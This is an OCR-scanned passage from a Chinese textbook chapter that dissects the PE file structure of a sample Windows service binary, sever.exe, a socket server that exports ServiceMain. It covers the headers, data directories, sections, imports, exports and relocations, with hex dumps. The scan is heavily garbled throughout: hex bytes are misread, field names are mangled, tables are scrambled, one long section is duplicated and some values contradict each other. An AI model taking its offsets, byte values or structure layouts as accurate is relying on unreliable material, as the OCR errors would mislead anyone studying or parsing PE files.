00000060 |74 20 62 65 20 72 75 6E 20 696E 20 44 4F 53 20 t be run in DOS 
00000070 |6D 6F 64 65 2E OD OD OA 2460 00 00 00 00 00 00 mode....$....... 
00000080 |7B 04 A3 AB 3F 65 CD F8 SF 65 CD F8 3F 65 CD F8 {.£f«?eÍø?eÍø?eÍa 
00000090 21 37 5E F8 3D 65 CD 21 37 58 F8 3E 65 CD F8 !7^ø=-eÍøl7Xø>eÍa 
000000A0 |21 37 4E F8 2B 65 F8 3F 65 CC F8 7F 65 CD F8 17No+eio?eio.efo 
00000050 |18 A3 B6 F8 38,6 CD F8 21 37 49 F8 36 65 CD F8 .8gqobefol7Io6efo 
000000C0 |21 37 SF F8 3É 65 CD F8 21 37 59 F8 3E 65 CD F8 !|7_ø>eÍøl7Yø>eÍa 
000000D0 |3F 65 Sare 3E 65 CD F8 21 37 5C F8 3E 65 CD F8 ?ezoyeiol7\eyeio 
000000E0 | 52 69, 68 3F 65 CD F8 00 00 00 00 00 00 00 00 Rich?eig........ 
000000F0 |00-60 00 00 00 00 00 00 00 00 00 OO OO 00 00 00 


00000100 50 45 00 og 4C 01 05 00 A6 1B DE 53 00 00 00 00 PE. 


14-2 IMAGE_DOS_HEADER 结构 体 原 始 数据 


3) 文件 头 
文件 头 (File Header) 分 为 3 个 部 分 ,结构 定义 如 下 。 


typedef struct _IMRGE NT HEADERS{ 
DWORD Signature 
IMAGE FILE HEADER FileHeader 
IMAGE _ OPTIONRL HEADER32 OptionalHeader 
} IMAGE_NT_HEADERS ENDS, * PIMAGE_NT HEADERS32; 


对 应 DEScipher. dat(sever. exe) 文 件 , 表 14-1 显示 结构 成 员 的 值 。 


表 14-1 文件 头 


Signature PE signature (PE) 00000100 ASCII "PE" 
Machine 00000104 DW 014C 
NumberOfSections 节 数 00000106 DW 0005 
TimeDateStamp 00000108 DD 53DE1BA6 

pee PointerToSymbolTable 0000010C DD 00000000 
NumberOfSymbols 00000110 DD 00000000 
SizeOfOptional Header 可 选 头 大 小 00000114 DW 00E0 
Characteristics 00000116 DW 0102 
MagicNumber 00000118 DW 010B 
MajorLinkerVersion 0000011A DB 09 
MinorLinkerVersion 0000011B DB 00 
SizeOfCode 0000011C DD 00001800 
SizeOfInitializedData 00000120 DD 0000DA00 
SizeOfUninitializedData 00000124 DD:00000000 
AddressOfEntryPoint 00000128 DD 00001965 
Bde 0000012C DD 00001000 
BaseOfData 00000130 DD 00003000 
edie 00000134 DD 00400000 

00000138 DD 00001000 

AGENT Seon Aunn A 0000013C DD 00000200 
_HEADERS FileAlignment 文件 对 齐 00060140; DW 0005 
MájorOSVersion 00000142 DW 0000 

IMAGE. Ne 00000144 DW 0000 

OPTIONAL. MajorImageVersion 00000146 DW 0000 

HEADER32 MinorImageVersion 00000148 DW 0005 
MajorSubsystemVersion 0000014A DW 0000 
MinorSubsystemVersion 0000014C DD 00000000 
Reserved 00000150 DD 00013000 
SizeOfImage 使 用 内 存 数量 00000154 DD 00000400 
SizeOfHeaders 00000158 DD 00000000 
CheckSum 0000015C DW 0002 
sieveien 0000015E DW 8140 
DUUOBaraetesisties, 00000160 DD 00100000 
SiseOfStackReserve 00000164 DD 00001000 
SizeOfStackCommit 00000168 DD 00100000 
SizeOfHeapReserve 0000016C DD 00001000 
SizeOfHeapCommit 00000170 DD 00000000 
Loda 00000174 DD 00000010 


NumberOfRvaAndSizes 
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sieveien 0000015E DW 8140 
DUUOBaraetesisties, 00000160 DD 00100000 
SiseOfStackReserve 00000164 DD 00001000 
SizeOfStackCommit 00000168 DD 00100000 
SizeOfHeapReserve 0000016C DD 00001000 
SizeOfHeapCommit 00000170 DD 00000000 
Loda 00000174 DD 00000010 
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续 表 


IMAGE_DATA_DIRECTORY[16] 


Export Table 


Import Table 


Resource Table 


Exception Table 


Certificate File 


映像 文件 目录 项 数目 Relocation Table 
IMAGE 描述 了 一 个 特定 的 、 Debug Data 
IMAGE_NT OPTIONAL 位 于 目录 项 后 面 的 Architecture Data 
_HEADERS ”| 某 一 节 中 的 信息 的 位 置 : Global Ptr 
HEADER32 
(1) VirtualAddress: 32 位 的 RVA TLS Table 


(2) Size: 32 位 大 小 , 字 节 单位 
每 个 目录 项 占 8 个 字 节 


Load Config Table 


Bound Import Table 


Import Address Table 


Delay Import Descriptor 
COM+ Runtime Header 


Reserved 


其 中 成 员 变 量 AddressOfEntryPoint 是 代码 人 口 点 的 偏 移 量 ( 入 口 点 地 址 ) 。 执 行将 从 
这 里 开始 , 它 可 以 是 DLL 文件 的 LibMain() 的 地 址 ,或 者 一 个 程序 的 开始 代码 (这 里 相应 地 
叫 main()) 的 地 址 ,或 者 驱动 程序 的 DriverEntry() 的 地 址 。 

图 14-3 所 示 为 从 0x178 到 0x1F7 共 128 个 字 节 (16X8 字 节 ) 是 数据 目录 结构 (Data 
Directory,IMAGE_DATA_DIRECTORY) ,每 一 个 IMAGE_DATA_DIRECTORY 都 是 对 
应 一 个 PE 文件 重要 的 数据 结构 , 表 14-2 所 示 为 目录 的 定义 。 不 同类 型 的 PE 文件 用 到 的 
目录 项 也 不 一 样 ,EXE 文件 一 般 都 存在 IMAGE_DIRECTORY_ENTRY_IMPORT( 导 入 
表 ) ,而 不 存在 IMAGE_DIRECTORY_ ENTRY_EXPORT( 导 出 表 )。 而 DLL 则 二 者 都 包 
含 。DEScipher. dat(sever. exe) 文件 用 到 : 

(1) 导出 表 目 录 (RAV 一 0x00003E80,Size 一 0x4C) 。 

(2) 导入 表 目 录 (RAV 王 0x0000038FC,Size 一 0x64) 。 

G) 资源 目录 (RAV 王 0x00005000,Size 一 0xCl148) 。 

(4) 基 址 重 定 位 表 (RAV 一 0x00012000,Size 一 0x0218) 。 

(5) 调试 目录 (RAV 王 0x00003130,Size 一 0xlC) 。 

(6) Load Configuration Directory(RAV 王 0x0003778 .Size 一 0x40) 。 


00000170 
00000180 
00000190 
000001A0 
00000180 
000001c0 
000001D0 
000001E0 


00 00 00 00 10 00 00 00 
FC 38 00 00 64 00 00 00 
00 00 00 00 00 00 00 00 
00 20 01 00 18 02 00 00 
00 00 00 00 00 00 00 00 
00 00 OO 00 00 OO 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 


80 3E 00 00 4C 00 00 00 . 
00 50 or 
00 00 or 
30 31 Of 
00 00 or 

ol 

0 


78 37 


000001F0 


00 00 00 00 00 00 00 OE 


2E 74 65 78 74 00 00 00 R 


00000200 
00000210 
00000220 


Bz 16000000100000 
00 00 00 00 00 00 00 00 
2E 72 64 61 74 61 00 00 


00 18 00 OO OO 04 00 00 7 
00 00 00 00 20 00 00 60 
CC OE 00 00 00 30 00 00 


.rdata..i....0.- 


14-3 IMAGE _DATA_DIRECTORY16 个 目录 项 原始 数据 


(7) 导 和 地址 表 (RAV 一 0x00003000,Size 一 0x0108) 。 
sever. exe 虽 是 EXE 文件 ,但 输出 了 一 个 ServiceMain 函数 。 


表 14-2 目录 定义 
# define IMAGE_DIRECTORY_ENTRY_EXPORT 0 // 导 出 表 目录 ; 大 多 用 于 DLL 文件 
# define IMAGE_DIRECTORY_ENTRY _IMPORT 1 // 导 入 表 目录 
# define IMAGE_DIRECTORY_ENTRY_RESOURCE 2 // 资 源 目录 
# define IMAGE_DIRECTORY_ENTRY_EXCEPTION 3 // 异 常 目 录 
# define IMAGE_DIRECTORY_ENTRY_SECURITY 4 // 安 全 目录 
# define IMAGE_DIRECTORY_ENTRY_BASERELOC 5 // 基 址 重 定位 表 
# define IMAGE_DIRECTORY_ENTRY_DEBUG 6 // 调 试 目录 
# define IMAGE_DIRECTORY_ENTRY_ARCHITECTURE 7 // Architecture Specific Data 
# define IMAGE_DIRECTORY_ENTRY_GLOBALPTR 8 // RVA of GP 

9 


# define IMAGE_DIRECTORY_ENTRY_TLS 


// TLS Directory 


# define IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 


// Load Configuration Directory 


# define IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 


// 绑 定 导 人 表 目录 


# define IMAGE_DIRECTORY_ENTRY _IAT 


// 导 人 地 址 表 


# define IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 


// Delay Load Import Descriptors 


# define IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 


4) 节目 录 


// COM Runtime descriptor 


节目 录 (Section directories) 从 偏 移 地 址 0x1F8 开始 存储 ,每 个 节 由 两 个 主要 部 分 组 成 ， 
如 表 14-3 所 示 。 首 先 , 是 一 个 节 描 述 (IMAGE_SECTION_HEADER, 节 头 类 型 ), 每 个 节 
描述 占 40 个 字 节 ,其 成 员 变 量 PointerToRawData 给 出 本 节 原 始 数 据 的 偏 移 地 址 。 其 次 ， 


节目 录 中 节 的 个 数 由 : 


image nt_headers. image file header. NumberOfSections = 0x03 


给 出 ,如 表 14-1 所 示 。 
相关 成 员 变 量 说 明 如 下 。 


(1) VirtualAddress( 虚 拟 地 址 ) : 是 一 个 32 位 的 值 ,用 来 保存 载 和 人 RAM( 内 存 ) 后 , 节 


中 数据 的 RVA. 


(2) SizeOfRawData( 原 始 数据 大 小 ): 是 一 个 32 位 的 值 , 它 表 示 节 中 数据 被 填充 到 大 


约 下 一 个 “FileAlignment” 的 整数 倍 时 节 的 大 小 。 


(3) PointerToRawData( 原 始 数据 指针 ): 是 一 个 32 位 的 值 , 因 为 它 是 从 文件 的 开头 到 
节 中 数据 的 偏 移 量 。PointerToRawData = 00400, SECTION[0] 节 的 原始 数据 (Sections’ 


raw data) 的 偏 移 地 址 。 


在 文件 偏 移 地 址 0x02C0 至 0x0400 之 间 有 一 片 值 为 0 的 区 域 是 空闲 的 ,可 以 填充 任意 


数据 。 
5) 导入 表 和 导出 表 


导入 表 (IMAGE_IMPORT_DESCRIPTOR) 和 导出 表 (IMAGE_EXPORT_DIRECTORY) 


的 文件 偏 移 地 址 不 能 直观 获取 ,需要 进行 计算 。 


实践 教程 


表 14-3 节目 录 
Name[8] 节 名 000001F8 ASCII“. text” 代 码 节 
VirtualSize 00000200 DD 000016B2 
VirtualAddress 00000204 DD 00001000 
SizeOfRawData 00000208 DD 00001800 
IMAGE_ PointerToRawData 0000020C DD 00000400 
SECTION_ PointerToRelocations 00000210 DD 00000000 
HEADER[0] | PointerToLineNumbers 00000214 DD 00000000 
NumberOfRelocations 00000218 DW 0000 
NumberOfLineNumbers 0000021A DW 0000 
0000021C DD 60000020 
Ch: isti 
PETEN we WINE CODE|EXECUTE| READ 
ornati 00000220 ASCII". rdata"; SECTION 包含 只 读数 据 . 导 入 表 以 及 导出 表 的 节 
00000248 ASCII". data"; SECTION 数据 节 
IMAGE | 
一 00000270 ASCII". rsrc"; SECTION 
SECTION. rsrc"; ON 资源 节 
HEADER[4 
[4] 00000298 ASCII". reloc"; SECTION 重 定位 节 
0000400 55 8B EC 33 CO SD C2 10 00 CC cc cc cc cC VIL3AIA, .1111111] 
0000410 55 8B EC 51 56 C7 45 FC CC CC cc cc 83 7D UPAQVCEüII111)..| 
. text 0000420 74 06 83 7D 08 02 75 3C BB F4 6A OO 68 80 t.th. TE 
0000430 00 6A 02 6A 00 6A 00 68 00 00 00 40 68 4C 
SECTION[0] | poooo44o o0-EF-15 20-30-40-00 3B-F4 E6 7F OS OO DO 
0000450 FC 8B F4 BB 45 FC SO FF 15 1C 30 40 00 3B 
0000460 69 05 00 00 33 CO SE 83 C4 04 3B EC EB SC 
【 例 14-1] 以 sever. exe 的 导出 表 为 例 计 算 其 文件 偏 移 地 址 Export(RVA)。 由 上 述 


所 知 RVA 一 0x3E80,Size 一 0x4C 导出 表 数 据 目录 ,遍历 所 有 节 检 查 RV A 落 在 哪个 节 区 域 


内 。 方 法 如 下 。 


if(RVA> = SECTION. VirtualAddress && 
RVA < SECTION. Misc. VirtualSize + SECTION. VirtualAddress) then 


则 落 在 该 节 区 域内 


图 14-4 所 示 中 ,VirtualOffset BI 为 SECTION. VirtualAddress, 而 SECTION. 
PointerToRawData 即 为 RawOffset。 可 见 : 0x3E80 二 = 0x3000 H. 0x3E80 < 0x3000 + 
0x0ECC ,导出 表 位 于 . rdata 节 中 。 设 文件 偏 移 地 址 的 计算 公式 用 FRVA() 表 示 , 则 : 


[No | Name | VirtualSize | VirtualOffset | RawSize | Raw0ffset 


Ë 
= 
J 
J 
J 


14-4 Stud_PE 工具 显示 节 信 息 


FRVA(Export) = VirtualAddress — SECTION. VirtualAddress 
+ SECTION. PointerToRawData 
=0x3E80 — 0x3000 + 0x1C00 = 0x2A80 (14-1) 
(1) FAR. 
导入 表 的 文件 偏 移 地 址 FRVA(Import) =0x24FC, K 14-5 所 示 为 WinHex. exe 工具 
打开 执行 文件 DEScipher. dat(sever. exe) 并 定位 0x24FC 的 展示 图 。 


[000024F0O FE FF FF FF DB 20 40 00 EF 20 40 00 4C 3A OD 00| 
00002500 00 00 00 00 00 00 OD 00 76 3A 00 00 EC 30 00 00| 
00002510 60 39 00 00 00 00 00 00 00 00 00 00 BE 3A 00 00 


00002520 00 30 00 00 44 3A 00 00 00 00 00 00 00 00 00 00 
(00002530 DA 3A 00 00 E4 30 00 00 D8 39 00 00 00 00 00 00| 
00002540 00 00 00 00 CE 3B 00 00 78 30 00 00 00 00 00 00 
00002550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 OO of] 


图 14-5 导入 表 数 组 原始 数据 


每 个 DLL 有 一 个 导入 表 IMAGE_IMPORT_DESCRIPTOR( 占 20 字 节 ) 结 构 , 图 14-5 
显示 了 5 个 这 样 的 结构 体 , 最 后 一 个 结构 体 以 0 填充 表示 结束 , 即 DEScipher. dat (sever 
.exe) 文 件 依赖 4 个 DLL。 在 二 WinNT. h> 中 导入 表 结 构 定 义 如 下 ,并 以 第 一 个 DLL 为 例 。 


typedef struct _IMAGE IMPORT DESCRIPTOR { 
union { 
DWORD Characteristics; 
DWORD OriginalFirstThunk; 
} DUMMYUNIONNAME; 
DWORD TimeDateStamp; 
DWORD ForwarderChain; 
DWORD Name; 
DWORD FirstThunk; 
) IMAGE_IMPORT_DESCRIPTOR; 


其 中 ， 

Characteristics 和 OriginalFirstThunk: 一 个 联合 体 , 如 果 是 数组 的 最 后 一 项 , 则 
Characteristics 为 0, 否则 OriginalFirstThunk 保存 一 个 RVA, 指 向 一 个 IMAGE_THUNK 
_DATA 的 数组 ,这 个 数组 中 的 每 一 项 表示 一 个 导入 函数 , 值 为 0x00003A4C。 

TimeDateStamp: 映像 绑 定 前 ,这 个 值 是 0. 绑 定 后 是 导入 模块 的 时 间 戳 , 值 为 0。 

ForwarderChain: 转发 链 , 值 为 0。 

Name; 一 个 RVA, 指 向 导入 DLL 模块 的 名 字 , 值 为 0x00003A76 。 

FirstThunk: 是 一 个 RVA ,指向 一 个 IMAGE_THUNK_DATA 数组 , 值 为 0x000030EC。 

以 上 值 皆 需 通 过 公式 (14-1) 计 算 其 文件 的 偏 移 地址 ,如 Name 的 RVA 为 : 

FRVA(Name)=0x3A76—0x3000 二 0x1C00 二 0x2676 

4 个 DLL 模块 名 别 为 WS2_32. dll.KERNEL32. dll, USER32. dll 和 MSVCR90. dll, 其 
相应 的 导出 函数 的 原始 数据 如 图 14-6 所 示 。OriginalFirstThunk 与 FirstThunk 皆 指 向 一 
个 IMAGE_THUNK_DATA32( 占 4 个 字 节 ) 的 数组 ,以 4 个 字 节 的 0 值 结束 。 其 结构 定 
义 如 下 。 


FRVA(Export) = VirtualAddress — SECTION. VirtualAddress 
+ SECTION. PointerToRawData 
=0x3E80 — 0x3000 + 0x1C00 = 0x2A80 (14-1) 
(1) FAR. 
导入 表 的 文件 偏 移 地 址 FRVA(Import) =0x24FC, K 14-5 所 示 为 WinHex. exe 工具 
打开 执行 文件 DEScipher. dat(sever. exe) 并 定位 0x24FC 的 展示 图 。 


[000024F0O FE FF FF FF DB 20 40 00 EF 20 40 00 4C 3A OD 00| 
00002500 00 00 00 00 00 00 OD 00 76 3A 00 00 EC 30 00 00| 
00002510 60 39 00 00 00 00 00 00 00 00 00 00 BE 3A 00 00 


00002520 00 30 00 00 44 3A 00 00 00 00 00 00 00 00 00 00 
(00002530 DA 3A 00 00 E4 30 00 00 D8 39 00 00 00 00 00 00| 
00002540 00 00 00 00 CE 3B 00 00 78 30 00 00 00 00 00 00 
00002550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 OO of] 


图 14-5 导入 表 数 组 原始 数据 


每 个 DLL 有 一 个 导入 表 IMAGE_IMPORT_DESCRIPTOR( 占 20 字 节 ) 结 构 , 图 14-5 
显示 了 5 个 这 样 的 结构 体 , 最 后 一 个 结构 体 以 0 填充 表示 结束 , 即 DEScipher. dat (sever 
.exe) 文 件 依赖 4 个 DLL。 在 二 WinNT. h> 中 导入 表 结 构 定 义 如 下 ,并 以 第 一 个 DLL 为 例 。 


typedef struct _IMAGE IMPORT DESCRIPTOR { 
union { 
DWORD Characteristics; 
DWORD OriginalFirstThunk; 
} DUMMYUNIONNAME; 
DWORD TimeDateStamp; 
DWORD ForwarderChain; 
DWORD Name; 
DWORD FirstThunk; 
) IMAGE_IMPORT_DESCRIPTOR; 


其 中 ， 

Characteristics 和 OriginalFirstThunk: 一 个 联合 体 , 如 果 是 数组 的 最 后 一 项 , 则 
Characteristics 为 0, 否则 OriginalFirstThunk 保存 一 个 RVA, 指 向 一 个 IMAGE_THUNK 
_DATA 的 数组 ,这 个 数组 中 的 每 一 项 表示 一 个 导入 函数 , 值 为 0x00003A4C。 

TimeDateStamp: 映像 绑 定 前 ,这 个 值 是 0. 绑 定 后 是 导入 模块 的 时 间 戳 , 值 为 0。 

ForwarderChain: 转发 链 , 值 为 0。 

Name; 一 个 RVA, 指 向 导入 DLL 模块 的 名 字 , 值 为 0x00003A76 。 

FirstThunk: 是 一 个 RVA ,指向 一 个 IMAGE_THUNK_DATA 数组 , 值 为 0x000030EC。 

以 上 值 皆 需 通 过 公式 (14-1) 计 算 其 文件 的 偏 移 地址 ,如 Name 的 RVA 为 : 

FRVA(Name)=0x3A76—0x3000 二 0x1C00 二 0x2676 

4 个 DLL 模块 名 别 为 WS2_32. dll.KERNEL32. dll, USER32. dll 和 MSVCR90. dll, 其 
相应 的 导出 函数 的 原始 数据 如 图 14-6 所 示 。OriginalFirstThunk 与 FirstThunk 皆 指 向 一 
个 IMAGE_THUNK_DATA32( 占 4 个 字 节 ) 的 数组 ,以 4 个 字 节 的 0 值 结束 。 其 结构 定 
义 如 下 。 


00002660 OD 00 00 80 00 00 00 00 53 00 57 53 41 53 6F 63 ...l....S.WSASoc 
00002670 | 6B 65 74 57 00 00 57 53 32 SF 33 32 2E 64 6C 6C ketW..W52_32.dl1l 
00002680 |00 00 43 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 ..C.CloseHandle. 
00002690 |7F 00 43 72 65 61 74 65 46 69 6C 65 57 00 21 04 ..CreateFileW.!. 
000026A0 |53 6C 65 65 70 00 A7 03 53 65 74 43 6F 6E 73 6F Sleep.S.SetConso 
000026580 6C 65 43 74 72 6C 48 61 6E 64 6C 65 72 00 4B 45 leCtrlHandler.KE 
000026C0 |52 4E 45 4C 33 32 2E 64 6C 6C 00 00 F8 01 4D 65 RNEL32.dll..o.Me | 
000026D0 73 73 61 67 65 42 6F 78 41 00 55 53 45 52 33 32 ssageBoxA.USER32 
000026E0 |2E 64 6C 6C 00 00 15 01 SF 61 6D 73 67 SF 65 78 .dll...._amsg_ex 
000026F0 |69 74 00 00 F7 00 SF SF 77 67 65 74 6D 61 69 6E it..+.__wgetmain 
00002700 |61 72 67 73 00 00 2C 01 SF 63 65 78 69 74 00 OO args..,._cezit.. 
000027C0 |73 65 74 SF 61 70 70 SF 74 79 70 65 00 00 4D 53 set_app_type..MS 
000027D0 |56 43 52 39 30 2E 64 6C 6C 00 4B 01 SF 63 72 74 VCR90.d11.K. crt 
000027E0 |5F 64 65 62 75 67 67 65 72 SF 68 6F 6F 6B 00 00 _debugger_hook.. 
000027F0 |43 00 3F 74 65 72 6D 69 6E 61 74 65 40 40 59 41 C.?terminate@@YA 


14-6 ”模块 名 及 其 导出 函数 的 原始 数据 


typedef struct _IMAGE THUNK_DATA32 { 
union { 
DWORD ForwarderString; // PBYTE 
DWORD Function; // PDWORD 
DWORD Ordinal; 
PIMAGE IMPORT_ BY_NAME AddressOfData; 
} ul; 
} IMAGE_THUNK_DATA32; 


OriginalFirstThunk 指向 的 IMAGE_THUNK_DATA 数组 包含 导入 信息 ,在 这 个 数组 
中 只 有 Ordinal 和 AddressOfData 是 有 用 的 ,因此 可 以 通过 OriginalFirstThunk 查找 到 函 
数 的 地 址 。FirstThunk 则 略 有 不 同 , 在 PE 文件 加 载 以 前 或 者 说 在 导入 表示 处理 以 前 ,其 所 
指向 的 数组 与 OriginalFirstThunk 中 的 数组 虽 不 是 同一 个 ,但 是 内 容 却 是 相同 的 ,都 包含 了 
导入 信息 ,而 在 加 载 之 后 ,FirstThunk 中 的 Function 开始 生效 , 它 指 向 实际 的 函数 地 址 ， 
为 FirstThunk 实际 上 指向 IAT 中 的 一 个 位 置 ,IAT 就 充当 了 IMAGE_THUNK_DATA 
数组 ,加载 完成 后 ,这 些 TA T 项 就 变 成 了 实际 的 函数 地 址 , 即 Function 的 意义 。 图 14-7 所 
IRH DLL 导入 函数 的 解析 图 。 

DLL 导入 函数 


地 址 1 函数 编号 1- 函 数 名 1 
函数 编号 2- 函 数 名 2 


DLL 


OriginalFirstThunk 


FirstThunk 


14-7 IMAGE_THUNK_DATA 解析 图 


以 第 一 个 IMAGE_IMPORT_DESCRIPTOR(CWS2_32. dll) 分 析 OriginalFirstThunk 
和 FirstThunk 。 

© OriginalFirstThunk 王 0x00003A4C ,公式 (14-1) 计 算 值 为 : 0x264C。 

@ FirstThunk 一 0x000030EC, 公 式 14-1 计算 值 为 : 0x1CEC。 

IMAGE_THUNK_DATA32 数组 如 图 14-8 所 示 。 


00002640 00 00 00 00 CC 3A 00 00 00 00 00 00 73 00 00 80 


[00002650 68 3A 00 OD 09 DO 00 80 02 00 00 80 03 00 OD 80 
00002660 pp'oo oo 80 po OD OD 53 00 57 53 41 53 6F 63 
DOODICEO “DD OO OO OO cc 3A OO OO OO OO OO OO Z3/0070DIBO | 
0ooolcF0 68 3A 00 00 09 00 00 80 02 00 00 80 03 00 00 80- 
00001D00 OD 00 00 80 00 00 00 00 00 00 00 5B 16 40 00 


图 14-8 IMAGE_THUNK_DATA32 数组 


从 图 14-8 可 见 ,OriginalFirstThunk 和 FirstThunk 指向 的 内 容 是 相同 的 ,同时 也 可 以 
看 出 sever. exe 用 到 WS2_32. dll 导出 的 6 个 函数 (4 个 字 节 代表 一 个 函数 导入 项 ) ,4 个 字 
节 又 分 两 个 字 节 标志 (WORD Hint) 和 两 个 字 节 的 函数 名 RVA 或 序号 (BYTE Name[1])， 
示例 如 下 。 

【 例 14-2】 第 一 个 函数 : 0x80000073, 其 最 高 位 为 1(Hint 一 0x8000), 则 低 16 位 为 函 
数 序 号 0x73(Name[0]= 0x73, Name[ 1] 二 0x00), 用 Dependency Walker 工具 打开 WS2_ 
32. dll 文件 如 图 14-9 所 示 , 则 该 函数 为 WSAStartup( 初 始 化 套 接 字 ) 。 


114 (0x0072)| 55 (0x0037) | WSAIsBlocking 
115 (0x0073)| 84 (0x0054)| WSAStartup 
116 (0x0074)| 26 (0x001A)| WSACleanup 


Ox000153BE 
0x00003AB2 || 
0x00003C5F | 


图 14-9 WS2_32. dll 为 导出 函数 


【 例 14-3] 第 二 个 函数 : 0x00003A68 ,其 最 高 位 为 0(Hint=0x0), 则 该 值 给 出 的 是 函 

数 名 的 虚拟 地 址 0x3A68(Name[0] 二 0x68, Name[1] 二 0x3A) 计 算 文件 偏 移 : 
FRVA(Function) =0x3A68—0x3000+0x1C00=0x2668 

在 这 个 文件 偏 移 地 址 上 的 值 为 WSASocketW (创建 一 个 网 络 的 套 接口 ) 。 

其 他 函数 是 htons() .bind() ,closesocket() 和 listen() ,在 源 代 码 sever. cpp 中 依次 调用 
TREA. 

(2) 导出 表 。 

由 导出 表 的 文件 偏 移 地 址 FRVA(Export) 二 0x2A80 给 出 如 图 14-10 所 示 的 内 容 。 


ooooza80 |00 00 00 00 AS 1B DE 53 00 00 00 00 B2 3E 00 00 
ooooza90 01 00 00 00 01 00 00 00 01 00 00 00 A8 3E 00 00 H huy 
oooozaao AC 3E 00 00 BO 3E 00 00 80 10 00 00 CO 3E 00 00 sy. 
oooozaB0 00 DO 44 45 53 63 69 70 68 65 72 2E 64 61 74 00 ..DEScipher.dat. 


00002ac0 72 76 69 63 65 4D 61 69 6E 00 00 00 OO OO ServiceMain..... 
|oooozapo |00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .ee 


abas 


14-10 ”导出 表 原 始 数据 


导出 表 的 结构 IMAGE_EXPORT_DIRECTORY 定义 如 下 , 占 40 个 字 节 。 


实践 教程 


typedef struct _IMAGE EXPORT DIRECTORY { 
DWORD Characteristics; // 一 般 为 0 
DWORD TimeDateStamp; // 导 出 表 生 成 的 时 间 截 ,由 连接 器 生成 ,0x53DE1BR5 
WORD MajorVersion; // 版 本 0 
WORD MinorVersion; // 版 本 0 
DWORD Name; // 模 块 文件 名 , 0x00003EB2 
DWORD Base; // 序 号 的 基数 ,导出 函数 的 序号 值 从 Base 开始 递增 , 0x01 
DWORD NumberOfFunctions; — // 所 有 导出 函数 的 数量 ,0x01 
DWORD NumberOfNames; // 按 名 字 导 出 函数 的 数量 , 0x01 
DWORD AddressOfFunctions; // 导出 函数 的 RVA 数组 ,0x00003ER8 
DWORD AddressOfNames; // RVA, 指向 函数 名 字数 组 , 0x00003EAC 
DWORD AddressOfNameOrdinals; //RVA, 指向 序号 数组 ,0x00003EB0 
} IMAGE _EXPORT DIRECTORY， * PIMAGE EXPORT_ DIRECTORY; 


其 中 由 公式 (14-1) 得 FRVA(CName) 王 0x2AB2 , 值 为 DEScipher. dat, W) 
FRVA(AddressOfNames) 一 0x2AAC 
0x2AAC 处 的 值 为 0x00003EC0 ,进一步 地 
FRVA(Ox00003EC0) =0x2AC0 
而 0x2AC0 处 的 值 为 ServiceMain, 即 导出 函数 名 。 图 14-11 所 示 为 导出 表 结 构 的 解 


析 图 。 
a ‘FileName\0* 
Name | 
函数 入 口 RVA 
Base 
国 数 入 口 RVA 
NumberOfFunctions 函数 入 DRVA 
NumberOfNames 
AddressOfFunctions RVA a a 
RVA ——] Fun2 
AddressOfNames LI 
RVA a 
AddressOfName Ds 
Ordinals 


14-11 导出 表 结 构 的 解析 图 


由 图 14-11 可 见 ,依据 函数 名 X 查找 在 内 存 中 某 一 导出 函数 地 址 Y 的 伪 代 码 如 下 。 


for i= 0 to NumberOfNames then do 
if X== * AddressOfNames then 
Y = pAddresOfFunction[ * pAddressOfNameOrdinals]; 
Break; 
Endif 


RddressOfNames++ ; 


AddressOfNameOrdinals++; 


Endfor 


6) 基 址 重 定位 表 


程序 默认 加 载 地 址 ImageBase 一 0x400000, 设 某 一 字符 串 String 的 存储 地 址 为 RV A 
(String) = 0x404002, 如 果 加 载 器 决定 将 程序 加 载 到 0x600000 处 时 ,产生 地 址 之 差 成 为 
delta 一 0x200000, 那 么 字符 串 位 置 应 该 为 RVA(String) = 0x604002, Windows 使 用 重 定 
位 机 制 处 理 上 述 情 况 , 即 链接 器 生成 PE 文件 的 时 候 将 编译 器 识别 的 重 定位 的 项 记录 在 一 
张 名 为 “ 重 定位 表 ” 里 ,并 将 表 的 RVR 保存 在 数据 目录 DataDirectory 中 ,序号 是 IMAGE_ 
DIRECTORY_ENTRY_BASERELOC。 通 常 需 重 定位 的 项 目 有 使 用 全 局 变量 的 指令 、 函 
数 指针 等 。 
文件 DEScipher. dat(sever. exe) 的 基 址 重 定位 表 的 虚拟 地 址 是 RA V =0x00012000, ,而 
大 小 为 0x0218, 由 公式 (14-1) 得 FRVA(Reloc) 二 0xF000, 对 应 的 数据 如 图 14-12 所 示 。 


0000F000 


00 10 00 00 48 01 00 00 


0000F 1 
0000F1 


20 
30 


4D 3E 54 3E 9D 3E A3 3E 
D8 3E ED 3E F8 3E 10 3F 


0000F140 


96 3F 98 3F BA 3F 00 00 


0000F150 
0000F1A0 
0000F 180 


58 30 SD 30 6F 30 8D 30 
|B1 34 BD 34 C7 34 CD 34 
El 35 4F 36 56 36 84 36 


0000F 1C0 


A2 36 A8 36 AE 36 00 00 


0000F1D0 
0000F1E0 

0000F1F0 
0000F200 


{OC 31 18 31 1C 31 4C 32 
08 35 OC 35 10 35 14 35 
B4 37 B9 37 6C 38 70 38 
B4 38 B8 38 D8 38 F4 38 


0000F2 


0000F220 


10 OC 00 00 00 2C 30 00 00 
00 00 00 00 00 00 00 00 


3D 30 43 30 59 30 9E 30 
AC 3E B3 3E BE 3E C4 3E 
26 3F 33 3F 70 3F 75 3F 
00 20 00 00 80 00 00 00 
A1 30 A7 30 10 31 16 31 
D3 34 D9 34 20 35 DA 35 
BA 36 90 36 96 36 9C 36 


00 30 00 00 44 00 00 00 


50 32 54 32 58 32 SC 32 
18 35 1C 35 C4 36 C8 36 
78 38 7C 38 94 38 98 38 
F8 38 00 00 00 40 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 


B 14-12 基 址 重 定位 表 的 原始 数据 


基 址 重 定位 表 IMAGE_BASE_RELOCATION 结构 定义 如 下 。 


typedef struct _IMAGE BASE RELOCATION { 


DWORD VirtualAddress; 


DWORD SizeOfBlock; 
// WORD TypeOffset[1]; 
JIMAGE_BASE_RELOCATION; 


// 页 起 始 地 址 RVR 


// 当 前 表 块 的 大 小 
// 数 组 ,每 项 占 两 个 字 节 代 表 一 个 重 定位 项 ,最 后 一 项 为 0 


